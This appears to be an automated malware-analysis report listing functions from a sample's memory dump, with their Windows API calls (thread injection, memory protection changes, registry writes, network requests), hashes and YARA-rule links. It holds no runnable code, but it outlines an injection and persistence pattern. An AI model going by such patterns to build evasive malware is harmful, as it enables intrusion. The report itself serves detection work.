Function 03B672AC, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 03B672CB

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d68a1f52039c4d47fbcfb6048c9a6b8debc0f19383dc57e2be5056b0ab382f09
Instruction ID: dcd6525791802dfbf7944cd3d9035944c08a6e7a1d5058ddbcd8b0fb570d7920
Opcode Fuzzy Hash: d68a1f52039c4d47fbcfb6048c9a6b8debc0f19383dc57e2be5056b0ab382f09
Instruction Fuzzy Hash: C5E0DF34F22A444BEB04ABF48CCE2B973D0F78820EF504879F946C7322DA2DC8448742

Uniqueness

Uniqueness Score: -1.00%

Function 03B7A26C, Relevance: 10.8, APIs: 7, Instructions: 346filememoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03B7A2A5
CreateFileA.KERNEL32 ref: 03B7A2DD
WriteFile.KERNEL32 ref: 03B7A336
WriteFile.KERNEL32 ref: 03B7A370
GetFileAttributesA.KERNEL32 ref: 03B7A379
WriteFile.KERNEL32 ref: 03B7A3AC
FindCloseChangeNotification.KERNEL32 ref: 03B7A57F

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$Write$AllocateAttributesChangeCloseCreateFindHeapNotification
String ID:
API String ID: 3036936801-0
Opcode ID: c63aa64be8a0d49d3a289e155731f3959607b9eeac4fa904c1a0dec45252e919
Instruction ID: 197a487101b2be702a8f2194a1aac4c824b7c58e7a387cfb358b23ff89fa365c
Opcode Fuzzy Hash: c63aa64be8a0d49d3a289e155731f3959607b9eeac4fa904c1a0dec45252e919
Instruction Fuzzy Hash: FBA1743071CA088FDB59EF1CEC89529B7E1F799711F04466EE48BC3265EE34E9458B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B5B2AC, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 192processCOMMON

Download Yara Rule

APIs

PathGetShortPath.SHELL32 ref: 03B5B32A
CreateProcessA.KERNEL32 ref: 03B5B3A5
GetExitCodeProcess.KERNEL32 ref: 03B5B445
FindCloseChangeNotification.KERNEL32 ref: 03B5B450

Strings

h, xrefs: 03B5B2F8

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: PathProcess$ChangeCloseCodeCreateExitFindNotificationShort
String ID: h
API String ID: 3114829184-2439710439
Opcode ID: 8a7bc30b3f488783507aecdadf1f8dab20edf04f0795bd0dedb69b661fb278ca
Instruction ID: eadd58f10e00b4ad86c343d56f18ea024a8400b59b974e43f144aca34cb4c478
Opcode Fuzzy Hash: 8a7bc30b3f488783507aecdadf1f8dab20edf04f0795bd0dedb69b661fb278ca
Instruction Fuzzy Hash: 4E514374618B488FD764EF68D8897AAB7E1FB98305F10457DE88AC3261DF74D442CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B72448, Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 03B57304: FindCloseChangeNotification.KERNEL32 ref: 03B573B0

VirtualProtectEx.KERNEL32 ref: 03B7254F
ResumeThread.KERNEL32 ref: 03B7258C
SuspendThread.KERNEL32 ref: 03B725AF

Part of subcall function 03B76A5C: RtlAllocateHeap.NTDLL ref: 03B76B04

VirtualProtectEx.KERNEL32 ref: 03B7262C

Part of subcall function 03B775C8: VirtualProtectEx.KERNEL32 ref: 03B7761C

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ProtectVirtual$Thread$AllocateChangeCloseFindHeapNotificationResumeSuspend
String ID:
API String ID: 1287749370-0
Opcode ID: 15e7bf8842743fed7b84804bae77516cfe42983b32f4ee478d663fa58ed80026
Instruction ID: e36e57a69daf6e3aeba2960cbc082d6dd2451435bd05530c2ce9b3688b712405
Opcode Fuzzy Hash: 15e7bf8842743fed7b84804bae77516cfe42983b32f4ee478d663fa58ed80026
Instruction Fuzzy Hash: 6261BF30718B084FD768EB18D885B6AB3D5FB89319F00497EE59BC7281DF38D9428B46

Uniqueness

Uniqueness Score: -1.00%

Function 03B55838, Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 03B5590C
SetFilePointer.KERNEL32 ref: 03B55926
ReadFile.KERNEL32 ref: 03B55948
FindCloseChangeNotification.KERNEL32 ref: 03B55963

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 36ff8efb6679f5466eb90e53da94e97b5b395a705cc24d389ff98479f336d1ad
Instruction ID: b3bcc11264839cac4cf06b54c538d25091b99d9050018096d263059573d9ff8b
Opcode Fuzzy Hash: 36ff8efb6679f5466eb90e53da94e97b5b395a705cc24d389ff98479f336d1ad
Instruction Fuzzy Hash: 7E41A830218A084FD768DF28D8C4729B7E1F789319B6846BEE45BC7261DB39D4478B81

Uniqueness

Uniqueness Score: -1.00%

Function 03B5B518, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03B78074: RegCreateKeyA.ADVAPI32 ref: 03B78097

RegQueryValueExA.KERNEL32 ref: 03B5B581

Strings

(, xrefs: 03B5B58D
(, xrefs: 03B5B5D0

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: 832472d3734cc6f47299b4fc43428eaed93958d4b477d959924be0505ab4113c
Instruction ID: 62af0d829064376fc495454a8362343467d7e135dae2885f86dec8c483de2e8a
Opcode Fuzzy Hash: 832472d3734cc6f47299b4fc43428eaed93958d4b477d959924be0505ab4113c
Instruction Fuzzy Hash: 0841D3352187488FE729DF14E898726B3E5F798309F24416DE88AC32A0EF79D547CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03B7AB90, Relevance: 4.7, APIs: 3, Instructions: 233networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET ref: 03B7AC2B
InternetConnectA.WININET ref: 03B7AC9F
HttpOpenRequestA.WININET ref: 03B7AD58

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: InternetOpen$ConnectHttpRequest
String ID:
API String ID: 3864186401-0
Opcode ID: b9eab44a32f3d56682b91040233da1be292866bb98eae9d21af0bed4ae39ca7f
Instruction ID: 3b0a1839baec8d853e08c5622bbf4119fa9ccc0549ab043d34b6e6bfec92962f
Opcode Fuzzy Hash: b9eab44a32f3d56682b91040233da1be292866bb98eae9d21af0bed4ae39ca7f
Instruction Fuzzy Hash: 6B71B330218A088FDB94EF28DC89669B7E5FB98305F54466ED88BC3255EF34D845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B5CC4C, Relevance: 4.7, APIs: 3, Instructions: 169registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03B60C34: FindFirstFileW.KERNEL32 ref: 03B60D47

RegOpenKeyA.ADVAPI32 ref: 03B5CD6B
RegSetValueExA.KERNEL32 ref: 03B5CD9F
RegCloseKey.KERNEL32 ref: 03B5CDAD

Part of subcall function 03B5704C: CreateFileW.KERNEL32 ref: 03B57085

Part of subcall function 03B69160: CreateFileW.KERNEL32 ref: 03B691BE

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$Create$CloseFindFirstOpenValue
String ID:
API String ID: 3325113042-0
Opcode ID: 7b97e5c1f675e06b7b6be501239816998de84e420be49575ad3f2ff4d3ff7c77
Instruction ID: 9d75880d947bea9ae88a3b67b797784b45a245f51f80ad2178b5c5beb0f63cc7
Opcode Fuzzy Hash: 7b97e5c1f675e06b7b6be501239816998de84e420be49575ad3f2ff4d3ff7c77
Instruction Fuzzy Hash: 8E519371608B488FDB64EF28D8C4A9A7BE2FB98304F60457EE44AC7151DF39E546CB81

Uniqueness

Uniqueness Score: -1.00%

Function 03B73C10, Relevance: 4.7, APIs: 3, Instructions: 159registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 03B73CD5
RegOpenKeyExW.KERNEL32 ref: 03B73D16
RegOpenKeyExW.KERNEL32 ref: 03B73D57

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 84fda4038b0e0cb9e2ede9717e05f2e91f6f705bf33992346fe644d7183c07ec
Instruction ID: 9ee13b3ddb85073134cab1b200fe2a29cf1ceb6a07e3cc963cdbd6f41ff34aa3
Opcode Fuzzy Hash: 84fda4038b0e0cb9e2ede9717e05f2e91f6f705bf33992346fe644d7183c07ec
Instruction Fuzzy Hash: 21416434318B498FDB54EB64D894B6AB7E6FBC8344F04497DE45AC3250DF74D8419B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B69160, Relevance: 4.6, APIs: 3, Instructions: 150fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 03B691BE
WriteFile.KERNEL32 ref: 03B69270
SetEndOfFile.KERNEL32 ref: 03B6927D

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: 511d3e435465cc021a588971af7509e3d1d1f063fbc1361524cccdd97d53717d
Instruction ID: 4b2d3a2f5009d6728e56c2f52155b9191bed38ed4d7224395599bf8fdcfafbf0
Opcode Fuzzy Hash: 511d3e435465cc021a588971af7509e3d1d1f063fbc1361524cccdd97d53717d
Instruction Fuzzy Hash: 2041E4306187044FE75CAB2CA88A37573D5F789329F24526DE99BC32D2DF3888438646

Uniqueness

Uniqueness Score: -1.00%

Function 03B77944, Relevance: 4.6, APIs: 3, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 03B77974
RegSetValueExA.KERNEL32 ref: 03B779ED
RegCloseKey.KERNEL32 ref: 03B77A39

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: d60605290c2742525fd28bf67db7fd803f0783b538415e7cc7bbc3db2f28c75a
Instruction ID: e352770003d56d55d8711b6f3dc5a8e11bdcb6b237ce2d42268c0e27adbefea2
Opcode Fuzzy Hash: d60605290c2742525fd28bf67db7fd803f0783b538415e7cc7bbc3db2f28c75a
Instruction Fuzzy Hash: F9312C30618B098FE798EF68985A736B7E1FB9C305F1445AEA45AC3261DF34DD418B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B7B038, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 03B7B175

Strings

H, xrefs: 03B7B05C

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: d6a6ac0830f2970704094e574fb554c5ceb8b7c77036587f7b5c8f204be07d29
Instruction ID: 42a576bd9526b19e60ba4c184517754fec054491d56df46d1e6293d1cfa364be
Opcode Fuzzy Hash: d6a6ac0830f2970704094e574fb554c5ceb8b7c77036587f7b5c8f204be07d29
Instruction Fuzzy Hash: ACA19130618B098FEB55EF58D88966AB7E1FB98305F0446AED88AC7261EF34D541CB81

Uniqueness

Uniqueness Score: -1.00%

Function 03B557B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03B78074: RegCreateKeyA.ADVAPI32 ref: 03B78097

RegSetValueExA.KERNEL32 ref: 03B557F9

Strings

(, xrefs: 03B557EC

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateValue
String ID: (
API String ID: 2259555733-3887548279
Opcode ID: 07f7cc667478ab8ef1d19fc85db3610221a09d82b77a03e17998df70647fe556
Instruction ID: b3ee11e8586095b7d8ce813cc0652996238bd42dc36cbb49abb9ddbbd0c3406d
Opcode Fuzzy Hash: 07f7cc667478ab8ef1d19fc85db3610221a09d82b77a03e17998df70647fe556
Instruction Fuzzy Hash: 9DF06234218B088FD744EF28E888A29B7F4F7C9344F004A69E94AC3260DA75D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03B72874, Relevance: 3.2, APIs: 2, Instructions: 231registryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 03B728A8

Part of subcall function 03B6E4F4: RegQueryValueExW.KERNEL32 ref: 03B6E534

CreateFileW.KERNEL32 ref: 03B72AB0

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateFileOpenQueryValue
String ID:
API String ID: 2015307909-0
Opcode ID: 8b4c83428d03453348ffa01c39086d23a967d60d7e77d2144c42a8a643b2b670
Instruction ID: a3fea06fda8d5d811e0162ac4e1e602f0cd4b759710dc473f7f5d0353733ea01
Opcode Fuzzy Hash: 8b4c83428d03453348ffa01c39086d23a967d60d7e77d2144c42a8a643b2b670
Instruction Fuzzy Hash: 0D714E30318F098FDB98EF28D894BAA73E2FBD8305F548969D45AC7261DF38D9458B41

Uniqueness

Uniqueness Score: -1.00%

Function 03B621A8, Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03B61FC0: VirtualProtect.KERNEL32 ref: 03B61FF3

VirtualProtect.KERNEL32 ref: 03B622C9
VirtualProtect.KERNEL32 ref: 03B622EC

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2de77a6af2156699d0835d0e557cd077459e401f376e5e8954a41830239c5343
Instruction ID: 5120585b165331e30c01a2235030c9bceb7d73c17646ba64d7efb56022b3749f
Opcode Fuzzy Hash: 2de77a6af2156699d0835d0e557cd077459e401f376e5e8954a41830239c5343
Instruction Fuzzy Hash: 0751A370618B098FE744EF28D885665B7E0FBAC315F1045BEE84EC7665DB38E941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B5836C, Relevance: 3.2, APIs: 2, Instructions: 185pipeCOMMON

Download Yara Rule

APIs

ConnectNamedPipe.KERNEL32 ref: 03B583E5

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: 0b6d0d50a4dd2b1143597b8ec7b9c0a1141bdb345614f9aac3fbc28330e0c0d4
Instruction ID: 90795830d5007800fe9c72a0d4e7b9f66c7973cdbe6886b8c4b10358f8be1ed8
Opcode Fuzzy Hash: 0b6d0d50a4dd2b1143597b8ec7b9c0a1141bdb345614f9aac3fbc28330e0c0d4
Instruction Fuzzy Hash: A1516530718A048BEB69EF38D89823A77E6FB98315B24467EF857C71A5DF34C4428B41

Uniqueness

Uniqueness Score: -1.00%

Function 03B78568, Relevance: 3.2, APIs: 2, Instructions: 168fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE ref: 03B785F1
MapViewOfFile.KERNELBASE ref: 03B7861D

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$CreateMappingView
String ID:
API String ID: 3452162329-0
Opcode ID: e213cb17c8fb15fc257d475beb80418200544488e47d2df6048195c811f704fb
Instruction ID: ee786a0ffbdaf2e4e94b819e8210403eb352afa812dfee84377cdc2a1e12ee3c
Opcode Fuzzy Hash: e213cb17c8fb15fc257d475beb80418200544488e47d2df6048195c811f704fb
Instruction Fuzzy Hash: 3751B230208B098FEB25EF24D88966AB7E1FB98319F04467DE45AC71A1DF38D541CB86

Uniqueness

Uniqueness Score: -1.00%

Function 03B64EFC, Relevance: 3.1, APIs: 2, Instructions: 123fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 03B64F8E
FindCloseChangeNotification.KERNEL32 ref: 03B65008

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ChangeCloseFileFindNotificationRead
String ID:
API String ID: 1200561807-0
Opcode ID: fc4e764f897b721a8e486daf512438fa5876a2a0f4c4bf1b3eb3ad141bda192a
Instruction ID: 58a2987caaa10d2be8eb87c17b153573d80d61647320eac259eeea8ea7d7d12b
Opcode Fuzzy Hash: fc4e764f897b721a8e486daf512438fa5876a2a0f4c4bf1b3eb3ad141bda192a
Instruction Fuzzy Hash: 3D31863161CA448FD758EF64E88D6A9B7E4FB98305F00857EE84AC3251DF74D5458782

Uniqueness

Uniqueness Score: -1.00%

Function 03B5699C, Relevance: 3.1, APIs: 2, Instructions: 122networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 03B56A53
WSACleanup.WS2_32 ref: 03B56A8C

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Cleanupgethostbyname
String ID:
API String ID: 398812830-0
Opcode ID: 4fa8e15ffa00ad1e7528fcf8bd8db57f7e6644532747ac23013eb737235d644c
Instruction ID: 9025e28a86aa6111eb61c9b346f63505d99ec3e0a365a8c354a723aec5fb7da9
Opcode Fuzzy Hash: 4fa8e15ffa00ad1e7528fcf8bd8db57f7e6644532747ac23013eb737235d644c
Instruction Fuzzy Hash: FA318331708A0C8FAB58EF68D88962C77E2F798305754847DE84EC7221DA35D9468781

Uniqueness

Uniqueness Score: -1.00%

Function 03B5704C, Relevance: 3.1, APIs: 2, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 03B57085
ReadFile.KERNEL32 ref: 03B570DB

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: e5391890ab067b6ba43663fad6989501c52c6c14d8c519f5256c5bee52601962
Instruction ID: c70273841bb9271722dc123066cad656c7bf70cfcbf304f47449eaaff1dde6f2
Opcode Fuzzy Hash: e5391890ab067b6ba43663fad6989501c52c6c14d8c519f5256c5bee52601962
Instruction Fuzzy Hash: 6C318730308B098FE755EF6DD88E769B6D5E798315F24417AEC5AC3260DF38D8468782

Uniqueness

Uniqueness Score: -1.00%

Function 03B78A10, Relevance: 3.1, APIs: 2, Instructions: 102COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 03B78AE4
RtlReleasePrivilege.NTDLL ref: 03B78AFF

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptorPrivilegeRelease
String ID:
API String ID: 3344132051-0
Opcode ID: f66fc1ae40bfa7fab18d266e327589dcbd7785d95a9e2ebde94c4c71daf7514d
Instruction ID: 4659527dbeb84511f8a92de03895c963e6efaf26b4ed754bf6ced8407e4fda7c
Opcode Fuzzy Hash: f66fc1ae40bfa7fab18d266e327589dcbd7785d95a9e2ebde94c4c71daf7514d
Instruction Fuzzy Hash: 52318030718F098FE704EB69D89A76A77E2FB88319F14493DB546C3251DA78D8418B43

Uniqueness

Uniqueness Score: -1.00%

Function 03B6F358, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,?,?,?,?,?,?,?,-00000001,03B5497D), ref: 03B6F396
RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,-00000001,03B5497D), ref: 03B6F403

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 05463b53360704e9eef6b60b4d085fa781837bc5b76a7aabe424cf046b48713c
Instruction ID: 941d3540bd36c4b5970682df3284ee0880b75873bf7535840017e633232d99c7
Opcode Fuzzy Hash: 05463b53360704e9eef6b60b4d085fa781837bc5b76a7aabe424cf046b48713c
Instruction Fuzzy Hash: 72216070618B098FE758EF2CE889675B7E1FB98315F14446EE44AC3261DB78DD41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03B6D840, Relevance: 3.1, APIs: 2, Instructions: 67registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03B78074: RegCreateKeyA.ADVAPI32 ref: 03B78097

RegSetValueExA.KERNEL32 ref: 03B6D89D
RegCloseKey.KERNEL32 ref: 03B6D8B2

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: a4eaa822aa4522f2fb845a710150406daf98e0f3956b42129489afdc77879b05
Instruction ID: 84699bd9d72a762bc1ec0fc38187ec0ce0d664c1da35a6e68685b87c45a141dd
Opcode Fuzzy Hash: a4eaa822aa4522f2fb845a710150406daf98e0f3956b42129489afdc77879b05
Instruction Fuzzy Hash: E6117C70608F088F9784EF589449665B7E1FB9C315F1546AEE88EC3321DB74DC818B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B78074, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 03B78097
RegOpenKeyA.ADVAPI32 ref: 03B780A4

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 62247e16eff71e4105f1c6a237c6a7f2b2bbcbccb0f1f319ca3f5c533c7ae8c2
Instruction ID: 6f11ab39cd7275c5445f4c3711d82e74bdd69bf29c7a4eb371da9f32ad9810ed
Opcode Fuzzy Hash: 62247e16eff71e4105f1c6a237c6a7f2b2bbcbccb0f1f319ca3f5c533c7ae8c2
Instruction Fuzzy Hash: 4B018030618B058FDB84EB5CD488A2ABBE5FBE8315F14447EE94EC3260DA74C9458783

Uniqueness

Uniqueness Score: -1.00%

Function 03B6B64C, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 03B6B67C
QueueUserAPC.KERNEL32 ref: 03B6B693

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 8dabf5a141576640d2b7f087de8a54da9cf4c576b89e18d7d0f8cdf607f23ac5
Instruction ID: 2d77b9d96db1157155755b83d75671b721777881637a8bf45c28990c911c93e0
Opcode Fuzzy Hash: 8dabf5a141576640d2b7f087de8a54da9cf4c576b89e18d7d0f8cdf607f23ac5
Instruction Fuzzy Hash: 2C012931754A044FEB58EF6DA84D7A977E2EB9C3117148169E509C7270DF38DC418B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B64974, Relevance: 1.8, APIs: 1, Instructions: 263COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32 ref: 03B64AD8

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 055fd34356b7c591597b60bdde17b3bbd72777a0dc8ef23b58b7b72269aad542
Instruction ID: 18ee665162287acdd5cf3e7a4eef85ce7f835671b12f67c58b76df3e73e43b24
Opcode Fuzzy Hash: 055fd34356b7c591597b60bdde17b3bbd72777a0dc8ef23b58b7b72269aad542
Instruction Fuzzy Hash: 4781F730518B488FD768EF69D8C866AB7E0FB58305F14456EE48AC3291DF38C485CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03B61DBC, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 03B61F07

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7382195ef688eaddf3922c60e0ddaf1994474945d40aa54a9f5b6cf63fb11b9a
Instruction ID: d707b8c49aca17bd5914e85c196c71156782e6640ff08e8b2572a9da964dbeda
Opcode Fuzzy Hash: 7382195ef688eaddf3922c60e0ddaf1994474945d40aa54a9f5b6cf63fb11b9a
Instruction Fuzzy Hash: CF618430618F099FD794EF1CD885669B7E5FB68305F50467EE44AC3662EB38E8418BC2

Uniqueness

Uniqueness Score: -1.00%

Function 03B7152C, Relevance: 1.7, APIs: 1, Instructions: 190registryCOMMON

Download Yara Rule

APIs

RegGetValueW.KERNEL32 ref: 03B716C9

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 95c33a2da873457e2c6dc32f1195118b8704f055c95fdebc0170a8a1067559c3
Instruction ID: 021d778c389676ac1b27657353152da900e54ef7b53c9c060c1bccc6f2b6ff17
Opcode Fuzzy Hash: 95c33a2da873457e2c6dc32f1195118b8704f055c95fdebc0170a8a1067559c3
Instruction Fuzzy Hash: B0519270218F188FE728DF2CE889569B7E1F798701F14452EE59AC3262DE34D9428BC1

Uniqueness

Uniqueness Score: -1.00%

Function 03B576B4, Relevance: 1.7, APIs: 1, Instructions: 181COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 03B57736

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2309f41782243dc1bd71a19e54e9f885309e0f2c8a0ea0826a444778a0c8913b
Instruction ID: 12c663160df35642a98b12e3f3be1b9bc78528464bbd68665dfe826b86934131
Opcode Fuzzy Hash: 2309f41782243dc1bd71a19e54e9f885309e0f2c8a0ea0826a444778a0c8913b
Instruction Fuzzy Hash: 7841C630718E094FEB69FB2D9C5A33977D2E79831176845B9E80EC3261DE78D8028786

Uniqueness

Uniqueness Score: -1.00%

Function 03B66504, Relevance: 1.7, APIs: 1, Instructions: 152COMMON

Download Yara Rule

APIs

RtlAddVectoredContinueHandler.NTDLL ref: 03B6666B

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 7d474f740c86d8d2be94d957f5437acad6063e6eaddfd226719a4add62369066
Instruction ID: c329dd6286ba1c486db945dbfe676dcb0e7213f05edac33e8eb3536e4e85e32e
Opcode Fuzzy Hash: 7d474f740c86d8d2be94d957f5437acad6063e6eaddfd226719a4add62369066
Instruction Fuzzy Hash: 79419130618A098FEB55EF38A8547EA77E2FB98308B4985BF944AC7265DF3CD501CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03B6EE40, Relevance: 1.6, APIs: 1, Instructions: 146fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03B68518: GetTempFileNameA.KERNEL32 ref: 03B6858F

DeleteFileA.KERNEL32 ref: 03B6EF7E

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$DeleteNameTemp
String ID:
API String ID: 1648863064-0
Opcode ID: 0e7f9052abeceebc3757f55a0a84acc12680f2ae29c4b66d6117d27c55cfd0c8
Instruction ID: 6186a5ea3df4de248ef4f0c92d7bc518d5bf29656ce2b82ac899fb424a7df2c3
Opcode Fuzzy Hash: 0e7f9052abeceebc3757f55a0a84acc12680f2ae29c4b66d6117d27c55cfd0c8
Instruction Fuzzy Hash: 05412A39310B094FE755EB6C99D03BE72D6E78CB84B4C84B9D50AD3252EE2CD94187C2

Uniqueness

Uniqueness Score: -1.00%

Function 03B79760, Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 03B79844

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
